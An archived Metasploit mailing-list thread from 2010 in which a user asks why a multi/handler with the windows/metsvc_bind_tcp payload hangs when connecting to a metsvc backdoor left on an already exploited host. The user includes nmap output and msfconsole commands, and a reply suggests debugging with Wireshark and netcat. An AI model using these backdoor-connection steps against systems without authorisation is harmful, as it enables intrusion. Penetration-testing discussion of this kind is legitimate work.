Metasploit mailing list archives

Re: Having a problem with metsvc


From: Rob Fuller <mubix () room362 com>
Date: Sat, 18 Sep 2010 08:09:48 -0400

Pop open Wireshark and see what's happening, also try connecting to it with
netcat with verbose and see what it says.

--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org


On Sat, Sep 18, 2010 at 6:36 AM, Andrew Stubbs <andrew.stubbs () stusoft com>wrote:

 Having a problem with metsvc - what am i doing wrong ?

Exploited box
Did run metsvc
Service is running :

 nmap aa.bb.cc.dd

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-09-18 12:19 BST
Nmap scan report for aa.bb.cc.dd
Host is up (0.067s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
31337/tcp open  Elite

Then did  for attacker:

      =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 567 exploits - 214 auxiliary
+ -- --=[ 211 payloads - 27 encoders - 8 nops

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set RHOST aa.bb.cc.dd
RHOST => aa.bb.cc.dd
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler

But it just hangs at that point

No firewall in the way etc.

Ideas ?

Andrew
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: